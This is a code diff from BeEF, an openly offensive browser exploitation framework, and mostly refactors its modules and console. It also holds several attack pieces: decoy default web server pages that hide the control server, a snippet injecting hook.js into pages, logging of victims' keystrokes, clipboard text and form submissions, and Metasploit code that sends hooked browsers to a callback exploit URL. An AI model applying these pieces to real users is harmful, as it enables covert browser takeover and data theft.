"<div class=\"content-middle\"><h2>About CentOS:</h2><b>The Community ENTerprise Operating System</b> (CentOS) is an Enterprise-class Linux Distribution derived from sources freely provided to the public by a prominent North American Enterprise Linux vendor. CentOS conforms fully with the upstream vendors redistribution policy and aims to be 100% binary compatible. (CentOS mainly changes packages to remove upstream vendor branding and artwork.) The CentOS Project is the organization that builds CentOS.</p>" +
"<p>For information on CentOS please visit the <a href=\"http://www.centos.org/\">CentOS website</a>.</p>" +
"<p><h2>Note:</h2><p>CentOS is an Operating System and it is used to power this website; however, the webserver is owned by the domain owner and not the CentOS Project. <b>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project.</b>" +
"<p>Unless this server is on the CentOS.org domain, the CentOS Project doesn't have anything to do with the content on this webserver or any e-mails that directed you to this site.</p> " +
"<p>For example, if this website is www.example.com, you would find the owner of the example.com domain at the following WHOIS server:</p>" +
"<p><a href=\"http://www.internic.net/whois.html\">http://www.internic.net/whois.html</a></p>" +
"</div>" +
"</div>" +
"</body>" +
"</html>"
when "iis"
"<html>" +
"<head>" +
"<meta HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=Windows-1252\">" +
"<title ID=titletext>Under Construction</title>" +
"</head>" +
"<body bgcolor=white>" +
"<table>" +
"<tr>" +
"<td ID=tableProps width=70 valign=top align=center>" +
"<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
"<td ID=tablePropsWidth width=400>" +
"<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
"<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +
"<P ID=Comment2><!--Probable causes:<--><P ID=\"errordesc\"><font style=\"font:9pt/12pt verdana; color:black\">" +
"The site you are trying to view does not currently have a default page. It may be in the process of being upgraded and configured." +
"<P ID=term1>Please try this site again later. If you still experience the problem, try contacting the Web site administrator." +
"<hr size=1 color=\"blue\">" +
"<P ID=message1>If you are the Web site administrator and feel you have received this message in error, please see &quot;Enabling and Disabling Dynamic Content&quot; in IIS Help." +
"<h5 ID=head1>To access IIS Help</h5>" +
"<ol>" +
"<li ID=bullet1>Click <b>Start</b>, and then click <b>Run</b>." +
"<li ID=bullet2>In the <b>Open</b> text box, type <b>inetmgr</b>. IIS Manager appears." +
"<li ID=bullet3>From the <b>Help</b> menu, click <b>Help Topics</b>." +
"<li ID=bullet4>Click <b>Internet Information Services</b>.</ol>" +
"</td>" +
"</tr>" +
"</table>" +
"</body>" +
"</html>"
else
""
end
end
end
end
end
end
end

3
core/main/server.rb
View File

@@ -82,6 +82,9 @@ module BeEF
# Create http handler for the javascript hook file
self.mount("#{@configuration.get("beef.http.hook_file")}", BeEF::Core::Handlers::HookedBrowsers.new)
# Create handler for the initialization checks (Browser Details)
self.mount("/init", BeEF::Core::Handlers::BrowserDetails)
# Dynamically get the list of all the http handlers using the API and register them
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'mount_handler', self)

21
core/module.rb
View File

@@ -67,11 +67,6 @@ module BeEF
if class_symbol and class_symbol.respond_to?(:options)
return class_symbol.options
end
#TODO: do we really need to print this info? At then modules with no options are common,
# so I guess we shouldn't print this info even in debug mode
# else
# print_debug "Module '#{mod}', no options method defined"
# end
end
return []
end
@@ -434,22 +429,22 @@ module BeEF
# @param [String] mod module key
# @param [String] hbsession hooked browser session
# @param [Array] opts array of module execute options (see #get_options)
# @return [Boolean] whether or not the BeEF system executed the module
# @return [Fixnum] the command_id associated to the module execution when info is persisted. nil if there are errors.
# @note The return value of this function does not specify if the module was successful, only that it was executed within the framework
def self.execute(mod, hbsession, opts=[])
if not (self.is_present(mod) and self.is_enabled(mod))
print_error "Module not found '#{mod}'. Failed to execute module."
return false
return nil
end
if BeEF::API::Registrar.instance.matched?(BeEF::API::Module, 'override_execute', [mod, nil,nil])
BeEF::API::Registrar.instance.fire(BeEF::API::Module, 'override_execute', mod, hbsession,opts)
# @note We return true by default as we cannot determine the correct status if multiple API hooks have been called
return true
# @note We return not_nil by default as we cannot determine the correct status if multiple API hooks have been called
return 'not_available' # @note using metasploit, we cannot know if the module execution was successful or not
end
hb = BeEF::HBManager.get_by_session(hbsession)
if not hb
print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
return false
return nil
end
self.check_hard_load(mod)
command_module = self.get_definition(mod).new(mod)
@@ -457,12 +452,12 @@ module BeEF
command_module.pre_execute
end
h = self.merge_options(mod, [])
c = BeEF::Core::Models::Command.new(:data => self.merge_options(mod, opts).to_json,
c = BeEF::Core::Models::Command.create(:data => self.merge_options(mod, opts).to_json,
:hooked_browser_id => hb.id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
:creationdate => Time.new.to_i
).save
return true
)
return c.id
end
# Merges default module options with array of custom options

3
core/ruby/print.rb
View File

@@ -29,10 +29,9 @@ end
# Function used to print debug information
# @param [String] s String to be printed
# @note This function will only print messages if the debug flag is set to true
# @todo Once the console extension has been merged into the core, remove the extension checks.
def print_debug(s)
config = BeEF::Core::Configuration.instance
if config.get('beef.debug') || (BeEF::Extension.is_loaded('console') && BeEF::Extension::Console.verbose?)
if config.get('beef.debug') || BeEF::Core::Console::CommandLine.parse[:verbose]
puts Time.now.localtime.strftime("[%k:%M:%S]")+'[>]'.yellow+' '+s.to_s
end
end

2
extensions/admin_ui/api/command.rb
View File

@@ -29,7 +29,7 @@ module API
# Get the browser detail from the database.
#
def get_browser_detail(key)
bd = BeEF::Extension::Initialization::Models::BrowserDetails
bd = BeEF::Core::Models::BrowserDetails
(print_error "@session_id is invalid";return) if not BeEF::Filters.is_valid_hook_session_id?(@session_id)
bd.get(@session_id, key)
end

6
extensions/admin_ui/api/handler.rb
View File

@@ -44,8 +44,10 @@ module API
beef_server.mount('/ui/media', Rack::File.new(media_dir))
# mount the favicon file
beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
# mount the favicon file, if we're not imitating a web server.
if !configuration.get("beef.http.web_server_imitation.enable")
beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
end
end
end

4
extensions/admin_ui/config.yaml
View File

@@ -17,9 +17,7 @@ beef:
extension:
admin_ui:
name: 'Admin UI'
enable: true
username: "beef"
password: "beef"
enable: true
favicon_file_name: "favicon.ico"
favicon_dir: "/images"
login_fail_delay: 1

2
extensions/admin_ui/controllers/authentication/authentication.rb
View File

@@ -69,7 +69,7 @@ class Authentication < BeEF::Extension::AdminUI::HttpController
end
# check username and password
if not (username.eql? config.get('beef.extension.admin_ui.username') and password.eql? config.get('beef.extension.admin_ui.password') )
if not (username.eql? config.get('beef.credentials.user') and password.eql? config.get('beef.credentials.passwd') )
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{@request.ip} has failed to authenticate in the application.")
return
end

35
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -23,7 +23,7 @@ module Controllers
#
class Modules < BeEF::Extension::AdminUI::HttpController
BD = BeEF::Extension::Initialization::Models::BrowserDetails
BD = BeEF::Core::Models::BrowserDetails
def initialize
super({
@@ -208,36 +208,6 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal ip address
internal_ip = BD.get(zombie_session, 'InternalIP')
if not internal_ip.nil?
encoded_internal_ip = CGI.escapeHTML(internal_ip)
encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_ip_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal hostname
internal_hostname = BD.get(zombie_session, 'InternalHostname')
if not internal_hostname.nil?
encoded_internal_hostname = CGI.escapeHTML(internal_hostname)
encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_hostname_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the System Platform
system_platform = BD.get(zombie_session, 'SystemPlatform')
if not system_platform.nil?
@@ -636,7 +606,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
def2.push({'name' => k, 'value' => v})
}
# End hack
@body = (BeEF::Module.execute(mod_key, zombie_session, def2)) ? '{success: true}' : '{success: false}'
exec_results = BeEF::Module.execute(mod_key, zombie_session, def2)
@body = (exec_results != nil) ? '{success: true}' : '{success: false}'
end
# Re-execute an command_module to a zombie.

2
extensions/admin_ui/controllers/panel/index.html
View File

@@ -48,7 +48,7 @@
<%= nonce_tag %>
<div id="header">
<div class="right-menu">
<img src="/favicon.ico" alt="BeEF" title="BeEF" />
<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" />
BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> |
<a id='do-submit-bug-menu' href='https://github.com/beefproject/beef/issues/new' target='_blank'>Submit Bug</a> |
<a id='do-logout-menu' href='#'>Logout</a>

6
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -85,9 +85,9 @@ class Panel < BeEF::Extension::AdminUI::HttpController
# create a hash of simple hooked browser details
def get_simple_hooked_browser_hash(hooked_browser)
browser_icon = BeEF::Extension::Initialization::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Extension::Initialization::Models::BrowserDetails.os_icon(hooked_browser.session)
domain = BeEF::Extension::Initialization::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
return {
'session' => hooked_browser.session,

6
extensions/admin_ui/controllers/xssrays/xssrays.rb
View File

@@ -80,7 +80,7 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
)
xssrays_scan.save
print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_info("[XSSRAYS] Starting XSSRays [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
end
end
@@ -116,7 +116,7 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
)
xssrays_scan.save
print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_info("[XSSRAYS] Starting XSSRays [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
end
end
end
@@ -124,4 +124,4 @@ end
end
end
end
end
end

BIN
extensions/admin_ui/media/images/icons/apache_pb.gif Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.3 KiB

BIN
extensions/admin_ui/media/images/icons/pagerror.gif Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.7 KiB

BIN
extensions/admin_ui/media/images/icons/powered_by_rh.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.2 KiB

77
extensions/admin_ui/media/javascript/ui/panel/HooksTab.js Normal file
View File

@@ -0,0 +1,77 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
HooksTab = function() {
/*
* The panel used to configure the hook.
********************************************/
var hooks_panel = new Ext.FormPanel({
title: 'Hooks',
id: 'hooks-panel',
hideLabels : false,
border: false,
padding: '3px 5px 0 5px',
items:[{
fieldLabel: 'Text',
xtype: 'textarea',
id: 'inputText',
name: 'inputText',
width: '100%',
height: '40%',
allowBlank: true
},{
fieldLabel: 'Result',
xtype: 'textarea',
id: 'resultText',
name: 'resultText',
width: '100%',
height: '40%',
allowBlank: true
}],
buttons: [{
text: 'Add Hook',
handler: function() {
var form = Ext.getCmp('hooks-panel').getForm();
var form_values = form.getValues();
var input_text = form_values['inputText'];
var result="";
form.setValues({resultText: result});
}
},{
text: 'Delete Hook',
handler: function() {
var form = Ext.getCmp('hooks-panel').getForm();
var form_values = form.getValues();
var input_text = form_values['inputText'];
var result="";
form.setValues({resultText: result});
}
}]
});
HooksTab.superclass.constructor.call(this, {
region: 'center',
items: [hooks_panel],
autoScroll: true,
border: false
});
};
Ext.extend(HooksTab,Ext.Panel, {});

10
extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
View File

@@ -41,6 +41,7 @@ MainPanel = function(){
this.grid = new DataGrid('/ui/logs/all.json',30);
this.grid.border = false;
this.welcome_tab = new WelcomeTab;
//this.hooks_tab = new HooksTab;
//this.hackvertor_tab = new HackVertorTab;
MainPanel.superclass.constructor.call(this, {
@@ -71,7 +72,14 @@ MainPanel = function(){
items:[
this.grid
/*
]},{
]},{
id:'hooks-view',
layout:'border',
title:'Hooks',
hideMode:'offsets',
items:[
//this.hooks_tab
]},{
id:'hackvertor-view',
layout:'border',
title:'HackVertor',

33
extensions/console/extension.rb
View File

@@ -24,39 +24,8 @@ module Console
#
@short_name = @full_name = 'console'
@description = 'console environment to manage beef'
#
# Returns true of the verbose option has been enabled for the console.
# False if not.
#
# Example:
#
# $ ruby console.rb -v
# BeEF::Extension::Console.verbose? # => true
#
# $ ruby console.rb
# BeEF::Extension::Console.verbose? # => false
#
def self.verbose?
CommandLine.parse[:verbose]
end
#
# Returns true if we should reset the database. False if not.
#
# $ ruby console.rb -x
# BeEF::Extension::Console.resetdb? # => true
#
# $ ruby console.rb
# BeEF::Extension::Console.resetdb? # => false
#
def self.resetdb?
CommandLine.parse[:resetdb]
end
end
end
end
require 'extensions/console/banners'
require 'extensions/console/commandline'

6
extensions/console/lib/command_dispatcher/command.rb
View File

@@ -56,7 +56,7 @@ class Command
print_line("Module parameters:")
driver.interface.cmd['Data'].each{|data|
print_line(data['name'] + " => \"" + data['value'] + "\" # this is the " + data['ui_label'] + " parameter")
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # this is the " + data['ui_label'] + " parameter")
} if not driver.interface.cmd['Data'].nil?
end
@@ -153,7 +153,9 @@ class Command
print_line("Results retrieved: " + Time.at(output[0]['date'].to_i).to_s)
print_line("")
print_line("Response:")
print_line(output[0]['data']['data'].to_s)
output.each do |op|
print_line(op['data']['data'].to_s)
end
end
end
end

27
extensions/console/lib/command_dispatcher/core.rb
View File

@@ -31,6 +31,7 @@ class Core
"back" => "Move back from the current context",
"exit" => "Exit the console",
"help" => "Help menu",
"irb" => "Drops into an interactive Ruby environment",
"jobs" => "Print jobs",
"online" => "List online hooked browsers",
"offline" => "List previously hooked browsers",
@@ -150,7 +151,7 @@ class Core
])
BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Extension::Initialization::Models::BrowserDetails.os_icon(zombie.session))]
tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Core::Models::BrowserDetails.os_icon(zombie.session))]
end
puts "\n"
@@ -181,7 +182,7 @@ class Core
])
BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Extension::Initialization::Models::BrowserDetails.os_icon(zombie.session))]
tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Core::Models::BrowserDetails.os_icon(zombie.session))]
end
puts "\n"
@@ -236,6 +237,28 @@ class Core
print_status("Target a particular online, hooked browser")
print_status(" Usage: target <id>")
end
def cmd_irb(*args)
@@bare_opts.parse(args) {|opt, idx, val|
case opt
when "-h"
cmd_irb_help
return false
end
}
print_status("Starting IRB shell...\n")
begin
Rex::Ui::Text::IrbShell.new(binding).run
rescue
print_error("Error during IRB: #{$!}\n\n#{$@.join("\n")}")
end
end
def cmd_irb_help(*args)
print_status("Load the IRB, Interative Ruby Shell")
end
def cmd_review(*args)
@@bare_opts.parse(args) {|opt, idx, val|

34
extensions/console/lib/shellinterface.rb
View File

@@ -19,7 +19,7 @@ module Console
class ShellInterface
BD = BeEF::Extension::Initialization::Models::BrowserDetails
BD = BeEF::Core::Models::BrowserDetails
def initialize(config)
self.config = config
@@ -195,7 +195,7 @@ class ShellInterface
def2.push({'name' => k, 'value' => v})
}
# End hack
if BeEF::Module.execute(mod_key, self.targetsession.to_s, def2) == true
if BeEF::Module.execute(mod_key, self.targetsession.to_s, def2) != nil
return true
else
return false
@@ -417,21 +417,6 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal ip address
internal_ip = BD.get(self.targetsession, 'InternalIP')
if not internal_ip.nil?
encoded_internal_ip = CGI.escapeHTML(internal_ip)
encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_ip_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the System Platform
system_platform = BD.get(self.targetsession, 'SystemPlatform')
if not system_platform.nil?
@@ -447,21 +432,6 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal hostname
internal_hostname = BD.get(self.targetsession, 'InternalHostname')
if not internal_hostname.nil?
encoded_internal_hostname = CGI.escapeHTML(internal_hostname)
encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_hostname_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the zombie screen size and color depth
screen_params = BD.get(self.targetsession, 'ScreenParams')
if not screen_params.nil?

1
extensions/demos/html/basic.html
View File

@@ -1,3 +1,4 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>BeEF Basic Demo</title>

BIN
extensions/demos/html/checkJava.class Normal file
View File

Binary file not shown.

BIN
extensions/demos/html/checkJava.jar Normal file
View File

Binary file not shown.

19
extensions/demos/html/checkJava.java Executable file
View File

@@ -0,0 +1,19 @@
import java.io.*;
import java.util.*;
import java.net.*;
import java.applet.*;
// Keith Lee
// Twitter: @keith55
// http://milo2012.wordpress.com
// keith.lee2012[at]gmail.com
public class checkJava extends Applet{
public static int results = 0;
public void init() {
}
public int getInfo() {
results = 1;
return results;
}
}

5
extensions/demos/html/plain.html Normal file
View File

@@ -0,0 +1,5 @@
<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
document.write(commandModuleStr);
</script>

8
extensions/events/handler.rb
View File

@@ -66,10 +66,18 @@ module Events
return event['time'].to_s+'s - [Mouse Click] x: '+event['x'].to_s+' y:'+event['y'].to_s+' > '+event['target'].to_s
when 'focus'
return event['time'].to_s+'s - [Focus] Browser has regained focus.'
when 'copy'
return event['time'].to_s+'s - [User Copied Text] "'+event['data'].to_s+'"'
when 'cut'
return event['time'].to_s+'s - [User Cut Text] "'+event['data'].to_s+'"'
when 'paste'
return event['time'].to_s+'s - [User Pasted Text] "'+event['data'].to_s+'"'
when 'blur'
return event['time'].to_s+'s - [Blur] Browser has lost focus.'
when 'keys'
return event['time'].to_s+'s - [User Typed] "'+event['data'].to_s+'" > '+event['target'].to_s
when 'submit'
return event['time'].to_s+'s - [Form Submitted] '+event['data'].to_s+' > '+event['target'].to_s
end
print_debug '[EVENTS] Event handler has received an unknown event'
return 'Unknown event'

38
extensions/initialization/api.rb
View File

@@ -1,38 +0,0 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Initialization
module RegisterHttpHandler
# Register API calls
BeEF::API::Registrar.instance.register(BeEF::Extension::Initialization::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
#
# Register the http handler for the initialization script that retrieves
# all the information about hooked browsers.
#
def self.mount_handler(beef_server)
beef_server.mount('/init', BeEF::Extension::Initialization::Handler)
end
end
end
end
end

244
extensions/metasploit/api.rb
View File

@@ -14,166 +14,166 @@
# limitations under the License.
#
module BeEF
module Extension
module Metasploit
module API
module Extension
module Metasploit
module API
module MetasploitHooks
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Modules, 'post_soft_load')
# Load modules from metasploit just after all other module config is loaded
def self.post_soft_load
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf.login
msf_module_config = {}
path = BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path')
if not BeEF::Extension::Console.resetdb? and File.exists?("#{path}msf-exploits.cache")
module MetasploitHooks
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Modules, 'post_soft_load')
# Load modules from metasploit just after all other module config is loaded
def self.post_soft_load
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf.login
msf_module_config = {}
path = BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path')
if not BeEF::Core::Console::CommandLine.parse[:resetdb] and File.exists?("#{path}msf-exploits.cache")
print_debug "Attempting to use Metasploit exploits cache file"
raw = File.read("#{path}msf-exploits.cache")
begin
msf_module_config = YAML.load(raw)
msf_module_config = YAML.load(raw)
rescue => e
puts e
puts e
end
count = 1
msf_module_config.each{|k,v|
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [k])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [k,nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [k, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
msf_module_config.each { |k, v|
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [k])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [k, nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [k, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
}
print "\r\n"
else
else
msf_modules = msf.call('module.exploits')
count = 1
msf_modules['modules'].each{|m|
next if not m.include? "/browser/"
m_details = msf.call('module.info', 'exploit', m)
if m_details
key = 'msf_'+m.split('/').last
# system currently doesn't support multilevel categories
#categories = ['Metasploit']
#m.split('/')[0...-1].each{|c|
# categories.push(c.capitalize)
#}
msf_module_config[key] = {
'enable'=> true,
'msf'=> true,
'msf_key' => m,
'name'=> m_details['name'],
'category' => 'Metasploit',
'description'=> m_details['description'],
'authors'=> m_details['references'],
'path'=> path,
'class'=> 'Msf_module'
}
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [key])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [key,nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [key, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
end
msf_modules['modules'].each { |m|
next if not m.include? "/browser/"
m_details = msf.call('module.info', 'exploit', m)
if m_details
key = 'msf_'+m.split('/').last
# system currently doesn't support multilevel categories
#categories = ['Metasploit']
#m.split('/')[0...-1].each{|c|
# categories.push(c.capitalize)
#}
msf_module_config[key] = {
'enable'=> true,
'msf'=> true,
'msf_key' => m,
'name'=> m_details['name'],
'category' => 'Metasploit',
'description'=> m_details['description'],
'authors'=> m_details['references'],
'path'=> path,
'class'=> 'Msf_module'
}
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [key])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [key, nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [key, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
end
}
print "\r\n"
File.open("#{path}msf-exploits.cache", "w") do |f|
f.write(msf_module_config.to_yaml)
print_debug "Wrote Metasploit exploits to cache file"
f.write(msf_module_config.to_yaml)
print_debug "Wrote Metasploit exploits to cache file"
end
end
BeEF::Core::Configuration.instance.set('beef.module', msf_module_config)
end
BeEF::Core::Configuration.instance.set('beef.module', msf_module_config)
end
end
end
# Get module options + payloads when the beef framework requests this information
def self.get_options(mod)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'exploit', msf_key)
com = BeEF::Core::Models::CommandModule.first(:name => mod )
if msf_module_options
# Get module options + payloads when the beef framework requests this information
def self.get_options(mod)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'exploit', msf_key)
com = BeEF::Core::Models::CommandModule.first(:name => mod)
if msf_module_options
options = BeEF::Extension::Metasploit.translate_options(msf_module_options)
options << { 'name' => 'mod_id', 'id' => 'mod_id' , 'type' => 'hidden', 'value' => com.id}
options << {'name' => 'mod_id', 'id' => 'mod_id', 'type' => 'hidden', 'value' => com.id}
msf_payload_options = msf.call('module.compatible_payloads', msf_key)
if msf_payload_options
options << BeEF::Extension::Metasploit.translate_payload(msf_payload_options)
return options
options << BeEF::Extension::Metasploit.translate_payload(msf_payload_options)
return options
else
print_error "Unable to retrieve metasploit payloads for exploit: #{msf_key}"
print_error "Unable to retrieve metasploit payloads for exploit: #{msf_key}"
end
else
else
print_error "Unable to retrieve metasploit options for exploit: #{msf_key}"
end
end
end
end
end
# Execute function for all metasploit exploits
def self.override_execute(mod, hbsession, opts)
msf = BeEF::Extension::Metasploit::RpcClient.instance
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf_opts = {}
# Execute function for all metasploit exploits
def self.override_execute(mod, hbsession, opts)
msf = BeEF::Extension::Metasploit::RpcClient.instance
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf_opts = {}
opts.each { |opt|
next if ['e','ie_session','and_module_id'].include? opt['name']
msf_opts[opt["name"]] = opt["value"]
}
opts.each { |opt|
next if ['e', 'ie_session', 'and_module_id'].include? opt['name']
msf_opts[opt["name"]] = opt["value"]
}
if msf_key != nil and msf.login
# Are the options correctly formatted for msf?
# This call has not been tested
msf.call('module.execute', 'exploit', msf_key, msf_opts)
end
if msf_key != nil and msf.login
# Are the options correctly formatted for msf?
# This call has not been tested
msf.call('module.execute', 'exploit', msf_key, msf_opts)
end
hb = BeEF::HBManager.get_by_session(hbsession)
if not hb
print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
return false
end
hb = BeEF::HBManager.get_by_session(hbsession)
if not hb
print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
return false
end
bopts = []
uri = ""
if msf_opts['SSL']
uri += "https://"
else
uri += "http://"
end
config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit')
uri += config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']
bopts = []
uri = ""
if msf_opts['SSL']
uri += "https://"
else
uri += "http://"
end
config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit')
uri += config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']
bopts << { :sploit_url => uri }
c = BeEF::Core::Models::Command.new(:data => bopts.to_json,
:hooked_browser_id => hb.id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
:creationdate => Time.new.to_i
).save
bopts << {:sploit_url => uri}
c = BeEF::Core::Models::Command.new(:data => bopts.to_json,
:hooked_browser_id => hb.id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
:creationdate => Time.new.to_i
).save
# Still need to create command object to store a string saying "Exploit launched @ [time]", to ensure BeEF can keep track of
# which exploits where executed against which hooked browsers
return true
end
# Still need to create command object to store a string saying "Exploit launched @ [time]", to ensure BeEF can keep track of
# which exploits where executed against which hooked browsers
return true
end
# Get module options + payloads when the beef framework requests this information
def self.get_payload_options(mod,payload)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
# Get module options + payloads when the beef framework requests this information
def self.get_payload_options(mod, payload)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf = BeEF::Extension::Metasploit::RpcClient.instance
